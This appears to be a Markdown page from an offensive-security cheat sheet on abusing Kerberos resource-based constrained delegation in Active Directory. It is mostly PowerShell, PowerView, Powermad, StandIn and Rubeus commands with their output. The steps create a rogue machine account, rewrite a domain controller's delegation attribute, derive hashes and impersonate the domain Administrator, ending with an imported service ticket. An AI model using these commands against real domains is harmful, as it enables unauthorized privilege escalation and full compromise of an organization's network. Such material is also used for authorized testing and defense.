85 lines
4.3 KiB
Markdown
85 lines
4.3 KiB
Markdown
|
# Kerberos Delegation - Resource Based Constrained Delegation
|
||
|
|
||
|
Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
||
|
|
||
|
> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||
|
|
||
|
1. Import **Powermad** and **Powerview**
|
||
|
|
||
|
```powershell
|
||
|
PowerShell.exe -ExecutionPolicy Bypass
|
||
|
Import-Module .\powermad.ps1
|
||
|
Import-Module .\powerview.ps1
|
||
|
```
|
||
|
|
||
|
2. Get user SID
|
||
|
|
||
|
```powershell
|
||
|
$AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid
|
||
|
$ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID}
|
||
|
$ACE
|
||
|
ConvertFrom-SID $ACE.SecurityIdentifier
|
||
|
```
|
||
|
|
||
|
3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it
|
||
|
|
||
|
```powershell
|
||
|
New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force)
|
||
|
```
|
||
|
|
||
|
4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties
|
||
|
|
||
|
```powershell
|
||
|
$ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid
|
||
|
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
|
||
|
$SDBytes = New-Object byte[] ($SD.BinaryLength)
|
||
|
$SD.GetBinaryForm($SDBytes, 0)
|
||
|
Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
|
||
|
$RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
|
||
|
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
|
||
|
$Descriptor.DiscretionaryAcl
|
||
|
```
|
||
|
|
||
|
```ps1
|
||
|
# alternative
|
||
|
$SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid
|
||
|
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
|
||
|
|
||
|
# alternative
|
||
|
StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND
|
||
|
```
|
||
|
|
||
|
5. Use Rubeus to get hash from password
|
||
|
|
||
|
```powershell
|
||
|
Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan
|
||
|
[*] Input password : Weakest123*
|
||
|
[*] Input username : swktest$
|
||
|
[*] Input domain : factory.lan
|
||
|
[*] Salt : FACTORY.LANswktest
|
||
|
[*] rc4_hmac : F8E064CA98539B735600714A1F1907DD
|
||
|
[*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498
|
||
|
[*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347
|
||
|
[*] des_cbc_md5 : BA297CFD07E62A5E
|
||
|
```
|
||
|
|
||
|
6. Impersonate domain admin using our newly created machine account
|
||
|
|
||
|
```powershell
|
||
|
.\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
||
|
.\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap
|
||
|
|
||
|
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan'
|
||
|
[*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5)
|
||
|
[*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan'
|
||
|
[*] Sending S4U2proxy request
|
||
|
[+] S4U2proxy success!
|
||
|
[*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan':
|
||
|
|
||
|
doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD
|
||
|
AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE
|
||
|
LmZhY3RvcnkubGFu
|
||
|
|
||
|
[*] Action: Import Ticket
|
||
|
[+] Ticket successfully imported!
|
||
|
```
|